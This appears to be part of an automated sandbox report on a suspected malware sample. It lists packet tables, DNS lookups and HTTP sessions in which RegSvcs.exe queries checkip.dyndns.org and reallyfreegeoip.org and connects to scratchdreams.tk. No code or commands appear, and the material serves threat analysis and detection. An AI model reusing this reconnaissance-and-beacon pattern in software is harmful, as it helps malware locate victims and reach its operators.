RT_VERSION	0x240b8	0x3cc	data			0.4876543209876543
RT_VERSION	0x24484	0x3cc	data	English	United States	0.4897119341563786
RT_MANIFEST	0x24850	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2024 12:20:06.819891930 CEST	49709	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:06.825031042 CEST	80	49709	193.122.6.168	192.168.2.3
May 27, 2024 12:20:06.825115919 CEST	49709	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:06.825330973 CEST	49709	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:06.830281019 CEST	80	49709	193.122.6.168	192.168.2.3
May 27, 2024 12:20:13.686573029 CEST	80	49709	193.122.6.168	192.168.2.3
May 27, 2024 12:20:13.700628042 CEST	49709	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:13.705617905 CEST	80	49709	193.122.6.168	192.168.2.3
May 27, 2024 12:20:16.254606009 CEST	80	49709	193.122.6.168	192.168.2.3
May 27, 2024 12:20:16.308875084 CEST	49715	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:16.308907986 CEST	443	49715	188.114.96.3	192.168.2.3
May 27, 2024 12:20:16.309140921 CEST	49715	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:16.318341017 CEST	49715	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:16.318357944 CEST	443	49715	188.114.96.3	192.168.2.3
May 27, 2024 12:20:16.331178904 CEST	49709	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:17.371911049 CEST	80	49709	193.122.6.168	192.168.2.3
May 27, 2024 12:20:17.371934891 CEST	80	49709	193.122.6.168	192.168.2.3
May 27, 2024 12:20:17.372014046 CEST	49709	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:17.372379065 CEST	80	49709	193.122.6.168	192.168.2.3
May 27, 2024 12:20:17.372419119 CEST	49709	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:17.372456074 CEST	49709	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:17.859800100 CEST	443	49715	188.114.96.3	192.168.2.3
May 27, 2024 12:20:17.859920025 CEST	49715	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:17.862751007 CEST	49715	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:17.862761021 CEST	443	49715	188.114.96.3	192.168.2.3
May 27, 2024 12:20:17.863102913 CEST	443	49715	188.114.96.3	192.168.2.3
May 27, 2024 12:20:17.909265041 CEST	49715	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:17.921387911 CEST	49715	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:17.966506004 CEST	443	49715	188.114.96.3	192.168.2.3
May 27, 2024 12:20:18.345145941 CEST	443	49715	188.114.96.3	192.168.2.3
May 27, 2024 12:20:18.345263004 CEST	443	49715	188.114.96.3	192.168.2.3
May 27, 2024 12:20:18.345366001 CEST	49715	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:18.354113102 CEST	49715	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:18.359808922 CEST	49709	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:18.365638018 CEST	80	49709	193.122.6.168	192.168.2.3
May 27, 2024 12:20:19.559647083 CEST	80	49709	193.122.6.168	192.168.2.3
May 27, 2024 12:20:19.578217983 CEST	49716	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:19.578252077 CEST	443	49716	188.114.96.3	192.168.2.3
May 27, 2024 12:20:19.578644991 CEST	49716	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:19.579252005 CEST	49716	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:19.579267979 CEST	443	49716	188.114.96.3	192.168.2.3
May 27, 2024 12:20:19.615751982 CEST	49709	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:20.051111937 CEST	443	49716	188.114.96.3	192.168.2.3
May 27, 2024 12:20:20.061708927 CEST	49716	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:20.061748028 CEST	443	49716	188.114.96.3	192.168.2.3
May 27, 2024 12:20:20.202871084 CEST	443	49716	188.114.96.3	192.168.2.3
May 27, 2024 12:20:20.202977896 CEST	443	49716	188.114.96.3	192.168.2.3
May 27, 2024 12:20:20.203031063 CEST	49716	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:20.204576969 CEST	49716	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:20.215615988 CEST	49709	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:20.217581987 CEST	49717	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:20.221514940 CEST	80	49709	193.122.6.168	192.168.2.3
May 27, 2024 12:20:20.221576929 CEST	49709	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:20.223401070 CEST	80	49717	193.122.6.168	192.168.2.3
May 27, 2024 12:20:20.223475933 CEST	49717	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:20.230218887 CEST	49717	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:20.235241890 CEST	80	49717	193.122.6.168	192.168.2.3
May 27, 2024 12:20:21.881215096 CEST	80	49717	193.122.6.168	192.168.2.3
May 27, 2024 12:20:21.882855892 CEST	49718	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:21.882915974 CEST	443	49718	188.114.96.3	192.168.2.3
May 27, 2024 12:20:21.883054018 CEST	49718	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:21.883311033 CEST	49718	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:21.883326054 CEST	443	49718	188.114.96.3	192.168.2.3
May 27, 2024 12:20:21.924968004 CEST	49717	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:22.355186939 CEST	443	49718	188.114.96.3	192.168.2.3
May 27, 2024 12:20:22.357196093 CEST	49718	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:22.357219934 CEST	443	49718	188.114.96.3	192.168.2.3
May 27, 2024 12:20:22.485841990 CEST	443	49718	188.114.96.3	192.168.2.3
May 27, 2024 12:20:22.485937119 CEST	443	49718	188.114.96.3	192.168.2.3
May 27, 2024 12:20:22.486021042 CEST	49718	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:22.486653090 CEST	49718	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:22.540137053 CEST	49719	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:22.548178911 CEST	80	49719	193.122.6.168	192.168.2.3
May 27, 2024 12:20:22.548302889 CEST	49719	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:22.548465014 CEST	49719	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:22.556148052 CEST	80	49719	193.122.6.168	192.168.2.3
May 27, 2024 12:20:26.323143005 CEST	80	49719	193.122.6.168	192.168.2.3
May 27, 2024 12:20:26.343168974 CEST	49720	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:26.348170996 CEST	80	49720	193.122.6.168	192.168.2.3
May 27, 2024 12:20:26.348258018 CEST	49720	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:26.348359108 CEST	49720	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:26.353156090 CEST	80	49720	193.122.6.168	192.168.2.3
May 27, 2024 12:20:26.377986908 CEST	49719	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:26.990111113 CEST	80	49720	193.122.6.168	192.168.2.3
May 27, 2024 12:20:27.034231901 CEST	49720	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:27.502705097 CEST	49721	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:27.502809048 CEST	443	49721	188.114.96.3	192.168.2.3
May 27, 2024 12:20:27.502814054 CEST	49719	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:27.502914906 CEST	49721	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:27.503249884 CEST	49721	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:27.503282070 CEST	443	49721	188.114.96.3	192.168.2.3
May 27, 2024 12:20:27.518007994 CEST	80	49719	193.122.6.168	192.168.2.3
May 27, 2024 12:20:27.518090963 CEST	49719	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:27.991652012 CEST	443	49721	188.114.96.3	192.168.2.3
May 27, 2024 12:20:27.993459940 CEST	49721	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:27.993494987 CEST	443	49721	188.114.96.3	192.168.2.3
May 27, 2024 12:20:28.128933907 CEST	443	49721	188.114.96.3	192.168.2.3
May 27, 2024 12:20:28.129188061 CEST	443	49721	188.114.96.3	192.168.2.3
May 27, 2024 12:20:28.129290104 CEST	49721	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:28.129714012 CEST	49721	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:28.133286953 CEST	49720	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:28.134529114 CEST	49722	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:28.138757944 CEST	80	49720	193.122.6.168	192.168.2.3
May 27, 2024 12:20:28.138889074 CEST	49720	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:28.139365911 CEST	80	49722	193.122.6.168	192.168.2.3
May 27, 2024 12:20:28.139440060 CEST	49722	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:28.139539003 CEST	49722	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:28.144617081 CEST	80	49722	193.122.6.168	192.168.2.3
May 27, 2024 12:20:29.798959970 CEST	80	49722	193.122.6.168	192.168.2.3
May 27, 2024 12:20:29.800569057 CEST	49723	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:29.800673962 CEST	443	49723	188.114.96.3	192.168.2.3
May 27, 2024 12:20:29.800795078 CEST	49723	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:29.801031113 CEST	49723	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:29.801062107 CEST	443	49723	188.114.96.3	192.168.2.3
May 27, 2024 12:20:29.846780062 CEST	49722	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:30.277925968 CEST	443	49723	188.114.96.3	192.168.2.3
May 27, 2024 12:20:30.280951023 CEST	49723	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:30.280994892 CEST	443	49723	188.114.96.3	192.168.2.3
May 27, 2024 12:20:30.431580067 CEST	443	49723	188.114.96.3	192.168.2.3
May 27, 2024 12:20:30.431710958 CEST	443	49723	188.114.96.3	192.168.2.3
May 27, 2024 12:20:30.431826115 CEST	49723	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:30.432370901 CEST	49723	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:30.435810089 CEST	49722	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:30.436858892 CEST	49724	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:30.443238020 CEST	80	49722	193.122.6.168	192.168.2.3
May 27, 2024 12:20:30.443274975 CEST	80	49724	193.122.6.168	192.168.2.3
May 27, 2024 12:20:30.443329096 CEST	49722	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:30.443377018 CEST	49724	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:30.443523884 CEST	49724	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:30.448340893 CEST	80	49724	193.122.6.168	192.168.2.3
May 27, 2024 12:20:31.118014097 CEST	80	49724	193.122.6.168	192.168.2.3
May 27, 2024 12:20:31.119337082 CEST	49725	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:31.119384050 CEST	443	49725	188.114.96.3	192.168.2.3
May 27, 2024 12:20:31.119456053 CEST	49725	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:31.119700909 CEST	49725	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:31.119718075 CEST	443	49725	188.114.96.3	192.168.2.3
May 27, 2024 12:20:31.159265995 CEST	49724	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:31.358717918 CEST	80	49724	193.122.6.168	192.168.2.3
May 27, 2024 12:20:31.358865023 CEST	49724	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:31.832616091 CEST	443	49725	188.114.96.3	192.168.2.3
May 27, 2024 12:20:31.834498882 CEST	49725	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:31.834515095 CEST	443	49725	188.114.96.3	192.168.2.3
May 27, 2024 12:20:31.972796917 CEST	443	49725	188.114.96.3	192.168.2.3
May 27, 2024 12:20:31.972920895 CEST	443	49725	188.114.96.3	192.168.2.3
May 27, 2024 12:20:31.972996950 CEST	49725	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:31.973454952 CEST	49725	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:31.976541042 CEST	49724	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:31.977725029 CEST	49726	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:31.981892109 CEST	80	49724	193.122.6.168	192.168.2.3
May 27, 2024 12:20:31.981961966 CEST	49724	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:31.982577085 CEST	80	49726	193.122.6.168	192.168.2.3
May 27, 2024 12:20:31.982639074 CEST	49726	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:31.982728004 CEST	49726	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:31.988094091 CEST	80	49726	193.122.6.168	192.168.2.3
May 27, 2024 12:20:32.626929045 CEST	80	49726	193.122.6.168	192.168.2.3
May 27, 2024 12:20:32.628909111 CEST	49727	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:32.628952026 CEST	443	49727	188.114.96.3	192.168.2.3
May 27, 2024 12:20:32.629044056 CEST	49727	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:32.629488945 CEST	49727	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:32.629499912 CEST	443	49727	188.114.96.3	192.168.2.3
May 27, 2024 12:20:32.675740004 CEST	49726	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:33.102072001 CEST	443	49727	188.114.96.3	192.168.2.3
May 27, 2024 12:20:33.103848934 CEST	49727	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:33.103863955 CEST	443	49727	188.114.96.3	192.168.2.3
May 27, 2024 12:20:33.255661011 CEST	443	49727	188.114.96.3	192.168.2.3
May 27, 2024 12:20:33.255791903 CEST	443	49727	188.114.96.3	192.168.2.3
May 27, 2024 12:20:33.255875111 CEST	49727	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:33.259156942 CEST	49727	443	192.168.2.3	188.114.96.3
May 27, 2024 12:20:33.310101032 CEST	49726	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:33.316941023 CEST	80	49726	193.122.6.168	192.168.2.3
May 27, 2024 12:20:33.317085981 CEST	49726	80	192.168.2.3	193.122.6.168
May 27, 2024 12:20:33.329921961 CEST	49728	443	192.168.2.3	188.114.97.3
May 27, 2024 12:20:33.329973936 CEST	443	49728	188.114.97.3	192.168.2.3
May 27, 2024 12:20:33.330105066 CEST	49728	443	192.168.2.3	188.114.97.3
May 27, 2024 12:20:33.330513000 CEST	49728	443	192.168.2.3	188.114.97.3
May 27, 2024 12:20:33.330528975 CEST	443	49728	188.114.97.3	192.168.2.3
May 27, 2024 12:20:33.824584007 CEST	443	49728	188.114.97.3	192.168.2.3
May 27, 2024 12:20:33.824781895 CEST	49728	443	192.168.2.3	188.114.97.3
May 27, 2024 12:20:33.826685905 CEST	49728	443	192.168.2.3	188.114.97.3
May 27, 2024 12:20:33.826703072 CEST	443	49728	188.114.97.3	192.168.2.3
May 27, 2024 12:20:33.827059984 CEST	443	49728	188.114.97.3	192.168.2.3
May 27, 2024 12:20:33.828607082 CEST	49728	443	192.168.2.3	188.114.97.3
May 27, 2024 12:20:33.870507002 CEST	443	49728	188.114.97.3	192.168.2.3
May 27, 2024 12:21:12.737709999 CEST	443	49728	188.114.97.3	192.168.2.3
May 27, 2024 12:21:12.737888098 CEST	443	49728	188.114.97.3	192.168.2.3
May 27, 2024 12:21:12.737961054 CEST	49728	443	192.168.2.3	188.114.97.3
May 27, 2024 12:21:12.738514900 CEST	49728	443	192.168.2.3	188.114.97.3
May 27, 2024 12:21:26.881263018 CEST	80	49717	193.122.6.168	192.168.2.3
May 27, 2024 12:21:26.881320000 CEST	49717	80	192.168.2.3	193.122.6.168

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2024 12:20:06.776062012 CEST	64778	53	192.168.2.3	1.1.1.1
May 27, 2024 12:20:06.783843994 CEST	53	64778	1.1.1.1	192.168.2.3
May 27, 2024 12:20:16.298515081 CEST	53102	53	192.168.2.3	1.1.1.1
May 27, 2024 12:20:16.308317900 CEST	53	53102	1.1.1.1	192.168.2.3
May 27, 2024 12:20:33.310018063 CEST	61328	53	192.168.2.3	1.1.1.1
May 27, 2024 12:20:33.322535992 CEST	53	61328	1.1.1.1	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 27, 2024 12:20:06.776062012 CEST	192.168.2.3	1.1.1.1	0x7233	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:16.298515081 CEST	192.168.2.3	1.1.1.1	0xf46d	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:33.310018063 CEST	192.168.2.3	1.1.1.1	0x90a8	Standard query (0)	scratchdreams.tk	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 27, 2024 12:20:06.783843994 CEST	1.1.1.1	192.168.2.3	0x7233	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 27, 2024 12:20:06.783843994 CEST	1.1.1.1	192.168.2.3	0x7233	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:06.783843994 CEST	1.1.1.1	192.168.2.3	0x7233	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:06.783843994 CEST	1.1.1.1	192.168.2.3	0x7233	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:06.783843994 CEST	1.1.1.1	192.168.2.3	0x7233	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:06.783843994 CEST	1.1.1.1	192.168.2.3	0x7233	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:16.308317900 CEST	1.1.1.1	192.168.2.3	0xf46d	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:16.308317900 CEST	1.1.1.1	192.168.2.3	0xf46d	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:33.322535992 CEST	1.1.1.1	192.168.2.3	0x90a8	No error (0)	scratchdreams.tk		188.114.97.3	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:33.322535992 CEST	1.1.1.1	192.168.2.3	0x90a8	No error (0)	scratchdreams.tk		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

scratchdreams.tk

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.3	49709	193.122.6.168	80	8160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:06.825330973 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 27, 2024 12:20:13.686573029 CEST	321	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 479abc85f82b6132295a6bbed2dcf1fc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
May 27, 2024 12:20:13.700628042 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
May 27, 2024 12:20:16.254606009 CEST	321	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fa1c1b20c5a2c8f9e438e3e6adf999c0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
May 27, 2024 12:20:17.371911049 CEST	321	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fa1c1b20c5a2c8f9e438e3e6adf999c0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
May 27, 2024 12:20:17.371934891 CEST	321	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fa1c1b20c5a2c8f9e438e3e6adf999c0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
May 27, 2024 12:20:17.372379065 CEST	321	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fa1c1b20c5a2c8f9e438e3e6adf999c0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
May 27, 2024 12:20:18.359808922 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
May 27, 2024 12:20:19.559647083 CEST	321	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 321e7e00e6bd109eec77b7c80883f378 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.3	49717	193.122.6.168	80	8160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:20.230218887 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
May 27, 2024 12:20:21.881215096 CEST	321	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bd47324f41f0dbfac182c2b9e29eb310 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.3	49719	193.122.6.168	80	8160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:22.548465014 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 27, 2024 12:20:26.323143005 CEST	745	IN	HTTP/1.1 504 Gateway Time-out Date: Mon, 27 May 2024 10:20:26 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive X-Request-ID: 0dde5f259ef2b5a5fcafb6a802982db7 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and 